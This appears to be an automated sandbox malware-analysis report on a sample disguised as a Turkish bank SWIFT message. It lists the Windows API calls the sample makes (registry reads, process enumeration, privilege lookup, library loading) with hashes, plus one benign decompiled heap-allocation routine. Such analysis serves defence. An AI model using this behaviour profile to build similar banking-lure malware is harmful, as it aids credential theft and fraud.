                                  APIs
                                  • RegQueryValueExW.KERNELBASE(?,00000E80,?,?), ref: 00A8B686
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.552180691.0000000000A8A000.00000040.00000001.sdmp, Offset: 00A8A000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_a8a000_Ziraat Bankasi Swift Mesaji.jbxd
                                  Similarity
                                  • API ID: QueryValue
                                  • String ID:
                                  • API String ID: 3660427363-0
                                  • Opcode ID: abb8ad73f177ed426935180e0c11df85a83968f9113565d4c7051cea651b877e
                                  • Instruction ID: 9b439d251075eafe2dd66a61aef48793b465e2cbca593370dcdabbd0e16cb72f
                                  • Opcode Fuzzy Hash: abb8ad73f177ed426935180e0c11df85a83968f9113565d4c7051cea651b877e
                                  • Instruction Fuzzy Hash: A921C5755093C06FD3138B25DC51F62BFB8EF87A20F0981DBE9848B653D225A919C7B2
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  APIs
                                  • RegOpenKeyExW.KERNELBASE(?,00000E80), ref: 00A8AA05
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.552180691.0000000000A8A000.00000040.00000001.sdmp, Offset: 00A8A000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_a8a000_Ziraat Bankasi Swift Mesaji.jbxd
                                  Similarity
                                  • API ID: Open
                                  • String ID:
                                  • API String ID: 71445658-0
                                  • Opcode ID: 30d9a233fcc3ddf401c0c4404f933f7641f28a6bed658e3efc0600e1ec9abce4
                                  • Instruction ID: 7e4fed4dbe9b699ebdc0d63b1bb2df1c83fdb3f5cde9c264cc1ea2c65ef495eb
                                  • Opcode Fuzzy Hash: 30d9a233fcc3ddf401c0c4404f933f7641f28a6bed658e3efc0600e1ec9abce4
                                  • Instruction Fuzzy Hash: 8521AE72500604AFEB209F19DD85FAAFBECEF18720F04845AED859B241D675E948CB72
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  APIs
                                  • K32EnumProcessModules.KERNEL32(?,00000E80,66234D72,00000000,00000000,00000000,00000000), ref: 00A8B72E
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.552180691.0000000000A8A000.00000040.00000001.sdmp, Offset: 00A8A000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_a8a000_Ziraat Bankasi Swift Mesaji.jbxd
                                  Similarity
                                  • API ID: EnumModulesProcess
                                  • String ID:
                                  • API String ID: 1082081703-0
                                  • Opcode ID: 046ef2a92f6efb9a8580b42106d75c4d8dc2d48d5c64d58749726c78f5991355
                                  • Instruction ID: 1c77d7e19bcbe64ac94ecabee882a40be8342f4e5f805d6fb5288a5b545a767d
                                  • Opcode Fuzzy Hash: 046ef2a92f6efb9a8580b42106d75c4d8dc2d48d5c64d58749726c78f5991355
                                  • Instruction Fuzzy Hash: A121C272509380AFE7128F25DC44F67BFA8EF45320F0884AAE944DB152C364A848CB71
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  APIs
                                  • LookupPrivilegeValueW.ADVAPI32(?,?,?), ref: 00A8ADE6
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.552180691.0000000000A8A000.00000040.00000001.sdmp, Offset: 00A8A000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_a8a000_Ziraat Bankasi Swift Mesaji.jbxd
                                  Similarity
                                  • API ID: LookupPrivilegeValue
                                  • String ID:
                                  • API String ID: 3899507212-0
                                  • Opcode ID: f0ae805a4000b3587b3ac948c2404fbef19b57154c4755adc8b609fc34c41cc1
                                  • Instruction ID: 671a5ca7ab7c92193f2e1b5b4feb47568ca575be251a6554b58ff6cda22f7acf
                                  • Opcode Fuzzy Hash: f0ae805a4000b3587b3ac948c2404fbef19b57154c4755adc8b609fc34c41cc1
                                  • Instruction Fuzzy Hash: E22162765093C05FE7128F65DC85B92BFA8EF16310F0984EBED85CB263D225D908C762
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  APIs
                                  • RegQueryValueExW.KERNELBASE(?,00000E80,66234D72,00000000,00000000,00000000,00000000), ref: 00A8AB08
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.552180691.0000000000A8A000.00000040.00000001.sdmp, Offset: 00A8A000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_a8a000_Ziraat Bankasi Swift Mesaji.jbxd
                                  Similarity
                                  • API ID: QueryValue
                                  • String ID:
                                  • API String ID: 3660427363-0
                                  • Opcode ID: b75d959f8326f8a86c31d94a9dd1ef3711cf8e4e21fe5d9928960ca8a6bd19a2
                                  • Instruction ID: 859231d786ddee558b4a8865f13ce851c6862858ca4543f4793ab41abcbc707a
                                  • Opcode Fuzzy Hash: b75d959f8326f8a86c31d94a9dd1ef3711cf8e4e21fe5d9928960ca8a6bd19a2
                                  • Instruction Fuzzy Hash: DA216A71600604AFEB20DF16DD84FA6FBECEF14710F08846AE9899B651D760E848CB72
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  APIs
                                  • FindCloseChangeNotification.KERNELBASE(?), ref: 00A8B0BC
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.552180691.0000000000A8A000.00000040.00000001.sdmp, Offset: 00A8A000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_a8a000_Ziraat Bankasi Swift Mesaji.jbxd
                                  Similarity
                                  • API ID: ChangeCloseFindNotification
                                  • String ID:
                                  • API String ID: 2591292051-0
                                  • Opcode ID: 5036953ab4da368f129561982f0bd32fede8cc68938bb746e7f667f80f13a652
                                  • Instruction ID: cdda9a2ea704ce811c37579e329194024e81a2b218d0532c9f2bf32a776f3ea5
                                  • Opcode Fuzzy Hash: 5036953ab4da368f129561982f0bd32fede8cc68938bb746e7f667f80f13a652
                                  • Instruction Fuzzy Hash: 4221A1725093C05FDB028B25DC95A92BFB4AF03324F0980DAEC858F663D2659908CB72
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  APIs
                                  • K32GetModuleInformation.KERNEL32(?,00000E80,66234D72,00000000,00000000,00000000,00000000), ref: 00A8B81E
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.552180691.0000000000A8A000.00000040.00000001.sdmp, Offset: 00A8A000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_a8a000_Ziraat Bankasi Swift Mesaji.jbxd
                                  Similarity
                                  • API ID: InformationModule
                                  • String ID:
                                  • API String ID: 3425974696-0
                                  • Opcode ID: e80568fd4cd87df66f1d43090ac73ccf2882dc3cf662ebbd86c33b370ab261e8
                                  • Instruction ID: 224da2347de546b9e9b9031d9df328797c014ee971ddb5ba3c304e8b8f9767e6
                                  • Opcode Fuzzy Hash: e80568fd4cd87df66f1d43090ac73ccf2882dc3cf662ebbd86c33b370ab261e8
                                  • Instruction Fuzzy Hash: 98117F71500204AFEB20DF6ADC85F66BBACEF44720F14846AED49DB251D774E808CBB1
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  APIs
                                  • FindCloseChangeNotification.KERNELBASE(?), ref: 00A8AD24
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.552180691.0000000000A8A000.00000040.00000001.sdmp, Offset: 00A8A000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_a8a000_Ziraat Bankasi Swift Mesaji.jbxd
                                  Similarity
                                  • API ID: ChangeCloseFindNotification
                                  • String ID:
                                  • API String ID: 2591292051-0
                                  • Opcode ID: 7605430366418f2e4bf27e8c731ebecd065f9e0997a3e50a116ebbd487caa387
                                  • Instruction ID: 5d9385b73c25934fa9f5ab2ca3621369e9625a1c506465b6461a53f1e27f1851
                                  • Opcode Fuzzy Hash: 7605430366418f2e4bf27e8c731ebecd065f9e0997a3e50a116ebbd487caa387
                                  • Instruction Fuzzy Hash: 6D2190B54097C05FEB128B25DC91792BFB4EF03320F0984DBEC848F553D2659948CB62
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  APIs
                                  • LoadLibraryA.KERNELBASE(?,00000E80), ref: 00A8BE87
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.552180691.0000000000A8A000.00000040.00000001.sdmp, Offset: 00A8A000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_a8a000_Ziraat Bankasi Swift Mesaji.jbxd
                                  Similarity
                                  • API ID: LibraryLoad
                                  • String ID:
                                  • API String ID: 1029625771-0
                                  • Opcode ID: b081e4055d3fdc3abbd8c9fd9b824e415116f72e3364c0a4f6c92503c0683050
                                  • Instruction ID: 7b55b5d904f7e36129f67b9c28e3fb359b035bf3bd7e73037f6f3420bdf66aad
                                  • Opcode Fuzzy Hash: b081e4055d3fdc3abbd8c9fd9b824e415116f72e3364c0a4f6c92503c0683050
                                  • Instruction Fuzzy Hash: E711E471504380AFE721CB15DC85FA2FFA8DF45720F08809AEE449B292D375A948CB61
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  APIs
                                  • MkParseDisplayName.OLE32(?,00000E80,?,?), ref: 00A8ABFA
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.552180691.0000000000A8A000.00000040.00000001.sdmp, Offset: 00A8A000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_a8a000_Ziraat Bankasi Swift Mesaji.jbxd
                                  Similarity
                                  • API ID: DisplayNameParse
                                  • String ID:
                                  • API String ID: 3580041360-0
                                  • Opcode ID: d6693d2f198cc0486c19fb840a0fe47bc036de5997390e2719cd7a007a93f1c2
                                  • Instruction ID: bb32fdfaace3f794ac7de750773439cf339f804583cd36efc4f7205ea4c9c397
                                  • Opcode Fuzzy Hash: d6693d2f198cc0486c19fb840a0fe47bc036de5997390e2719cd7a007a93f1c2
                                  • Instruction Fuzzy Hash: C121D2715093C06FC312CB29CC45F62BFB8EF86610F0881CBE9848B653D225F919CBA6
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  APIs
                                  • K32EnumProcessModules.KERNEL32(?,00000E80,66234D72,00000000,00000000,00000000,00000000), ref: 00A8B72E
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.552180691.0000000000A8A000.00000040.00000001.sdmp, Offset: 00A8A000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_a8a000_Ziraat Bankasi Swift Mesaji.jbxd
                                  Similarity
                                  • API ID: EnumModulesProcess
                                  • String ID:
                                  • API String ID: 1082081703-0
                                  • Opcode ID: 78936c537e90b50f15e1d0e2aa734a94d9f6c1e7011e366ff0708184094033e3
                                  • Instruction ID: 0395042a4ef54a17009cc8db8f82f51c685fb82010cf7218fabb7dea70e7f217
                                  • Opcode Fuzzy Hash: 78936c537e90b50f15e1d0e2aa734a94d9f6c1e7011e366ff0708184094033e3
                                  • Instruction Fuzzy Hash: 2B110471500300AFEB20DF29DC85BA6FBE8EF44320F04846AED49DB241D375A408CB75
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  APIs
                                  • SetErrorMode.KERNELBASE(?), ref: 00A8A8DC
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.552180691.0000000000A8A000.00000040.00000001.sdmp, Offset: 00A8A000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_a8a000_Ziraat Bankasi Swift Mesaji.jbxd
                                  Similarity
                                  • API ID: ErrorMode
                                  • String ID:
                                  • API String ID: 2340568224-0
                                  • Opcode ID: fc20c5f5151fd03ed29e9fc852458ff421a2bf119c5b5091ed0ebef90d262100
                                  • Instruction ID: 8c524ba767a1880158650defae2aaf8bfd796a8d47d17c729d898f7595720249
                                  • Opcode Fuzzy Hash: fc20c5f5151fd03ed29e9fc852458ff421a2bf119c5b5091ed0ebef90d262100
                                  • Instruction Fuzzy Hash: A9214A7140D3C45FD7138B259C94662BFB4DF17624F0980DBDD848F1A3D2695908C772
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  APIs
                                  • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 00A8A82A
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.552180691.0000000000A8A000.00000040.00000001.sdmp, Offset: 00A8A000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_a8a000_Ziraat Bankasi Swift Mesaji.jbxd
                                  Similarity
                                  • API ID: DuplicateHandle
                                  • String ID:
                                  • API String ID: 3793708945-0
                                  • Opcode ID: f2dafb024f685f92e99a16967880df2ffe08e18105e373db750c0fe088911ed3
                                  • Instruction ID: 5ae3e1850bb1bf72b67cafe1ac3718dc789e647cd590637d1f4d616150d665ea
                                  • Opcode Fuzzy Hash: f2dafb024f685f92e99a16967880df2ffe08e18105e373db750c0fe088911ed3
                                  • Instruction Fuzzy Hash: D5117271409780AFDB228F55DC44A62FFB4EF46310F0884DAED898B152D376A419DB72
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  APIs
                                  • TerminateProcess.KERNELBASE(?,00000E80,66234D72,00000000,00000000,00000000,00000000), ref: 00A8B32C
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.552180691.0000000000A8A000.00000040.00000001.sdmp, Offset: 00A8A000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_a8a000_Ziraat Bankasi Swift Mesaji.jbxd
                                  Similarity
                                  • API ID: ProcessTerminate
                                  • String ID:
                                  • API String ID: 560597551-0
                                  • Opcode ID: 5fdaa6182e31a8c3b86d59f0ab354c8c572b4a3e91b19a9663a9f81ebd40fb42
                                  • Instruction ID: abaf699a5bc5295d13d614ed55c4c08fded03881846c6809eb31ec7cdc5e9a46
                                  • Opcode Fuzzy Hash: 5fdaa6182e31a8c3b86d59f0ab354c8c572b4a3e91b19a9663a9f81ebd40fb42
                                  • Instruction Fuzzy Hash: 8111A371504304AFEB109F1AEC85BAABB98EF44721F1484AAED49DF241D774A904CB71
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  APIs
                                  • GetUserNameW.ADVAPI32(?,00000E80,?,?), ref: 00A8BB66
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.552180691.0000000000A8A000.00000040.00000001.sdmp, Offset: 00A8A000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_a8a000_Ziraat Bankasi Swift Mesaji.jbxd
                                  Similarity
                                  • API ID: NameUser
                                  • String ID:
                                  • API String ID: 2645101109-0
                                  • Opcode ID: 8b25ee82f4ac4bcfd5e2a696ce03c1057b012804e99823df67edffeb3b31a075
                                  • Instruction ID: f5271d2c6e27b27e520bb8b43b4bcc32b5c250c4831568964a198f9897b2e655
                                  • Opcode Fuzzy Hash: 8b25ee82f4ac4bcfd5e2a696ce03c1057b012804e99823df67edffeb3b31a075
                                  • Instruction Fuzzy Hash: 0E11B2715093806FC311CB25CC45F62BFB8EF86620F09819BED484B692D225F919CBA6
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  APIs
                                  • LoadLibraryA.KERNELBASE(?,00000E80), ref: 00A8BE87
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.552180691.0000000000A8A000.00000040.00000001.sdmp, Offset: 00A8A000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_a8a000_Ziraat Bankasi Swift Mesaji.jbxd
                                  Similarity
                                  • API ID: LibraryLoad
                                  • String ID:
                                  • API String ID: 1029625771-0
                                  • Opcode ID: 1d07b5690e853d00b6ae9b698701ac7d537c614d3cde7be5af7a23c698b0485a
                                  • Instruction ID: 1c4ac51546cd96c08b02b08c19c8d166714e172ddea5cc25563482ec16ab2e9f
                                  • Opcode Fuzzy Hash: 1d07b5690e853d00b6ae9b698701ac7d537c614d3cde7be5af7a23c698b0485a
                                  • Instruction Fuzzy Hash: 32110471500704AFEB20DF15DC85FB6FBA8DF04720F14849AEE489B281D3B5A948CBB6
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  APIs
                                  • LookupPrivilegeValueW.ADVAPI32(?,?,?), ref: 00A8ADE6
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.552180691.0000000000A8A000.00000040.00000001.sdmp, Offset: 00A8A000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_a8a000_Ziraat Bankasi Swift Mesaji.jbxd
                                  Similarity
                                  • API ID: LookupPrivilegeValue
                                  • String ID:
                                  • API String ID: 3899507212-0
                                  • Opcode ID: 3c6862f73f9b657ccec9de7a6c88b6dedc82f4ec0a02d5f547268c9f3ac81069
                                  • Instruction ID: f51bd82fb2c35955ddcc288294534ec246e1ce22e3cffb274cdcd3b2462c6992
                                  • Opcode Fuzzy Hash: 3c6862f73f9b657ccec9de7a6c88b6dedc82f4ec0a02d5f547268c9f3ac81069
                                  • Instruction Fuzzy Hash: FD1165716003408FEB20DF69D885756FBE8EF14721F08C46AED49DB641D675D804CB72
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  APIs
                                  • FormatMessageW.KERNELBASE(?,00000E80,?,?), ref: 00A8B432
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.552180691.0000000000A8A000.00000040.00000001.sdmp, Offset: 00A8A000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_a8a000_Ziraat Bankasi Swift Mesaji.jbxd
                                  Similarity
                                  • API ID: FormatMessage
                                  • String ID:
                                  • API String ID: 1306739567-0
                                  • Opcode ID: 585687a4a1bcdf13f755d37a0c693d981177d6f209529a71b2a551bf699e8b63
                                  • Instruction ID: 20a2b11c006b3c5018bb66a875824d084c3a134df2b6fa9608aedde12295416f
                                  • Opcode Fuzzy Hash: 585687a4a1bcdf13f755d37a0c693d981177d6f209529a71b2a551bf699e8b63
                                  • Instruction Fuzzy Hash: A101B171500200ABD310DF16DC86F26FBA8FB84B20F14816AED089B641E331F515CBE5
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  APIs
                                  • K32GetModuleFileNameExW.KERNEL32(?,00000E80,?,?), ref: 00A8B92A
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.552180691.0000000000A8A000.00000040.00000001.sdmp, Offset: 00A8A000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_a8a000_Ziraat Bankasi Swift Mesaji.jbxd
                                  Similarity
                                  • API ID: FileModuleName
                                  • String ID:
                                  • API String ID: 514040917-0
                                  • Opcode ID: 179793362b0fd5b3f5a690fae39f925bdd6309dc1b1be64648f04736d66f26db
                                  • Instruction ID: 2e22ffb4a1a8b2eb0d86aeaa3d7ef19eb92ed2ea3d6e39074f5dcc4d9b3c52da
                                  • Opcode Fuzzy Hash: 179793362b0fd5b3f5a690fae39f925bdd6309dc1b1be64648f04736d66f26db
                                  • Instruction Fuzzy Hash: 9B017171500600ABD710DF16DC86F26FBA8FB84B20F14816AED089B641E675F515CBA5
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  APIs
                                  • WSAStartup.WS2_32(?,00000E80,?,?), ref: 00A8A522
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.552180691.0000000000A8A000.00000040.00000001.sdmp, Offset: 00A8A000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_a8a000_Ziraat Bankasi Swift Mesaji.jbxd
                                  Similarity
                                  • API ID: Startup
                                  • String ID:
                                  • API String ID: 724789610-0
                                  • Opcode ID: e4852f49946f41ca15621cf4d52f744745f535dc0ccbf76a1da93320b5959c22
                                  • Instruction ID: f9c12766b2f726fdff2198e4113b4f84eafe6002a056621736410f8bf6b27b6f
                                  • Opcode Fuzzy Hash: e4852f49946f41ca15621cf4d52f744745f535dc0ccbf76a1da93320b5959c22
                                  • Instruction Fuzzy Hash: 0A017171500600ABD710DF16DC86B26FBA8FB84A20F14816AED089B641E675F515CBA5
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  APIs
                                  • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 00A8A82A
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.552180691.0000000000A8A000.00000040.00000001.sdmp, Offset: 00A8A000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_a8a000_Ziraat Bankasi Swift Mesaji.jbxd
                                  Similarity
                                  • API ID: DuplicateHandle
                                  • String ID:
                                  • API String ID: 3793708945-0
                                  • Opcode ID: f51d54b28821e2168862d1aa7a4410cf070a334ef0a9f9eb139765b2d065a1d8
                                  • Instruction ID: b1e153bae3b4deaa6afde3f8f3b48aa390328d2828bb04d7fa3c275a664d5105
                                  • Opcode Fuzzy Hash: f51d54b28821e2168862d1aa7a4410cf070a334ef0a9f9eb139765b2d065a1d8
                                  • Instruction Fuzzy Hash: AF016D318007409FEB218F55E884B62FFE0EF18720F08C4AAEE894A611D376E419DF72
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  APIs
                                  • MkParseDisplayName.OLE32(?,00000E80,?,?), ref: 00A8ABFA
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.552180691.0000000000A8A000.00000040.00000001.sdmp, Offset: 00A8A000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_a8a000_Ziraat Bankasi Swift Mesaji.jbxd
                                  Similarity
                                  • API ID: DisplayNameParse
                                  • String ID:
                                  • API String ID: 3580041360-0
                                  • Opcode ID: 9fc68a8ef62b6cf18e9c9f48dfbb9e1bd8251b2977e7bfe01ca0fce878194311
                                  • Instruction ID: 290863193b1f0fcf3d684385043182318d34fe71d3e4e829b086f9de33c56e20
                                  • Opcode Fuzzy Hash: 9fc68a8ef62b6cf18e9c9f48dfbb9e1bd8251b2977e7bfe01ca0fce878194311
                                  • Instruction Fuzzy Hash: 2501AD71500600ABD360DF1ADC82F22FBA8FB88B20F14815AED085B741E371F915CBE6
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  APIs
                                  • RegQueryValueExW.KERNELBASE(?,00000E80,?,?), ref: 00A8B686
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.552180691.0000000000A8A000.00000040.00000001.sdmp, Offset: 00A8A000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_a8a000_Ziraat Bankasi Swift Mesaji.jbxd
                                  Similarity
                                  • API ID: QueryValue
                                  • String ID:
                                  • API String ID: 3660427363-0
                                  • Opcode ID: 26bb9112fa7bc05d72bed9e55801be2c39d1cce46274ffdd8145e3f436a0c2d8
                                  • Instruction ID: abe7d9aaf897aafe4f7a817b93e86e50a963d93b7795ae48a4895e66b2a17b69
                                  • Opcode Fuzzy Hash: 26bb9112fa7bc05d72bed9e55801be2c39d1cce46274ffdd8145e3f436a0c2d8
                                  • Instruction Fuzzy Hash: 8801AD71500604ABD320DF1ADC82F22FBA8FB88B20F14815AED085B741E371F915CBE6
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  APIs
                                  • FindCloseChangeNotification.KERNELBASE(?), ref: 00A8B0BC
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.552180691.0000000000A8A000.00000040.00000001.sdmp, Offset: 00A8A000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_a8a000_Ziraat Bankasi Swift Mesaji.jbxd
                                  Similarity
                                  • API ID: ChangeCloseFindNotification
                                  • String ID:
                                  • API String ID: 2591292051-0
                                  • Opcode ID: 626c40c4e22fc6287076ae1ebdd953d5efcbf2add310c2b442127f10ad96739d
                                  • Instruction ID: 10a59bfa31aab26ca13196047a1f270e1a3633f7eb82750e21b51512dcf656be
                                  • Opcode Fuzzy Hash: 626c40c4e22fc6287076ae1ebdd953d5efcbf2add310c2b442127f10ad96739d
                                  • Instruction Fuzzy Hash: 4F018F71A147448FDB10DF1AE885756FFA4EF40720F18C0AADD598B646D775E808CB72
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  APIs
                                  • FindCloseChangeNotification.KERNELBASE(?), ref: 00A8AD24
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.552180691.0000000000A8A000.00000040.00000001.sdmp, Offset: 00A8A000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_a8a000_Ziraat Bankasi Swift Mesaji.jbxd
                                  Similarity
                                  • API ID: ChangeCloseFindNotification
                                  • String ID:
                                  • API String ID: 2591292051-0
                                  • Opcode ID: 452239f6b8db30d57e437fe62e430c4d149dfd2c96909c76e1621ca9553bb0ce
                                  • Instruction ID: e7ff15ac0487347449e51ca52aa320800e64769b09ee4499e54a6f773ab0daae
                                  • Opcode Fuzzy Hash: 452239f6b8db30d57e437fe62e430c4d149dfd2c96909c76e1621ca9553bb0ce
                                  • Instruction Fuzzy Hash: 9301DF719003408FEB20CF29E884766FBA4EF00321F08C0ABDD49CF652D279E808CB62
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.552180691.0000000000A8A000.00000040.00000001.sdmp, Offset: 00A8A000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_a8a000_Ziraat Bankasi Swift Mesaji.jbxd
                                  Similarity
                                  • API ID: closesocket
                                  • String ID:
                                  • API String ID: 2781271927-0
                                  • Opcode ID: 717cda54d5c64c52b3f015b2eb4167652e80c5baa0c16a42a7866d4b5971a161
                                  • Instruction ID: 77c9921e7d6e1ad3e134c44837e1cbb272d4dbab626d69bb36b249f7233bf109
                                  • Opcode Fuzzy Hash: 717cda54d5c64c52b3f015b2eb4167652e80c5baa0c16a42a7866d4b5971a161
                                  • Instruction Fuzzy Hash: 960162719042449FEB20DF15E889766FBA4EF54720F18C4ABDD498F246D3B9A408CB72
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  APIs
                                  • SetErrorMode.KERNELBASE(?), ref: 00A8A8DC
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.552180691.0000000000A8A000.00000040.00000001.sdmp, Offset: 00A8A000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_a8a000_Ziraat Bankasi Swift Mesaji.jbxd
                                  Similarity
                                  • API ID: ErrorMode
                                  • String ID:
                                  • API String ID: 2340568224-0
                                  • Opcode ID: c495e16828e2cf7ef900d49b7b817c9de4b80741a5520d407ce0965704417821
                                  • Instruction ID: 9607fb4396e0982303e97a73ff04b8c6203e1198ae29773dba96cfb9ffda197b
                                  • Opcode Fuzzy Hash: c495e16828e2cf7ef900d49b7b817c9de4b80741a5520d407ce0965704417821
                                  • Instruction Fuzzy Hash: FAF0AF34904344CFEB20DF09E884761FFA0EF14720F08C0AADD494B256D3B5A849DBB2
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 94%
                                  			E00403E3D(void* __ecx, long _a4) {
                                  				void* _t4;
                                  				void* _t6;
                                  				void* _t7;
                                  				long _t8;
                                  
                                  				_t7 = __ecx;
                                  				_t8 = _a4;
                                  				if(_t8 > 0xffffffe0) {
                                  					L7:
                                  					 *((intOrPtr*)(E00404831())) = 0xc;
                                  					__eflags = 0;
                                  					return 0;
                                  				}
                                  				if(_t8 == 0) {
                                  					_t8 = _t8 + 1;
                                  				}
                                  				while(1) {
                                  					_t4 = RtlAllocateHeap( *0x4132b0, 0, _t8); // executed
                                  					if(_t4 != 0) {
                                  						break;
                                  					}
                                  					__eflags = E00403829();
                                  					if(__eflags == 0) {
                                  						goto L7;
                                  					}
                                  					_t6 = E004068FD(_t7, __eflags, _t8);
                                  					_pop(_t7);
                                  					__eflags = _t6;
                                  					if(_t6 == 0) {
                                  						goto L7;
                                  					}
                                  				}
                                  				return _t4;
                                  			}







                                  0x00403e3d
                                  0x00403e43
                                  0x00403e49
                                  0x00403e7b
                                  0x00403e80
                                  0x00403e86
                                  0x00000000
                                  0x00403e86
                                  0x00403e4d
                                  0x00403e4f
                                  0x00403e4f
                                  0x00403e66
                                  0x00403e6f
                                  0x00403e77
                                  0x00000000
                                  0x00000000
                                  0x00403e57
                                  0x00403e59
                                  0x00000000
                                  0x00000000
                                  0x00403e5c
                                  0x00403e61
                                  0x00403e62
                                  0x00403e64
                                  0x00000000
                                  0x00000000
                                  0x00403e64
                                  0x00000000

                                  APIs
                                  • RtlAllocateHeap.NTDLL(00000000,?,00000004,?,00407C67,?,00000000,?,004067DA,?,00000004,?,?,?,?,00403B03), ref: 00403E6F
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.548601003.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_400000_Ziraat Bankasi Swift Mesaji.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: AllocateHeap
                                  • String ID:
                                  • API String ID: 1279760036-0
                                  • Opcode ID: a4c9c6b9c171d7e3068f9dcb93680387a8cae48819217d3cebbdef174e207782
                                  • Instruction ID: 2c5ed35c3885d6f2518923907421e71a1374dda36297243b1d9f5d3b1e0eb56a
                                  • Opcode Fuzzy Hash: a4c9c6b9c171d7e3068f9dcb93680387a8cae48819217d3cebbdef174e207782
                                  • Instruction Fuzzy Hash: 54E03922505222A6D6213F6ADC04F5B7E4C9F817A2F158777AD15B62D0CB389F0181ED
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Memory Dump Source
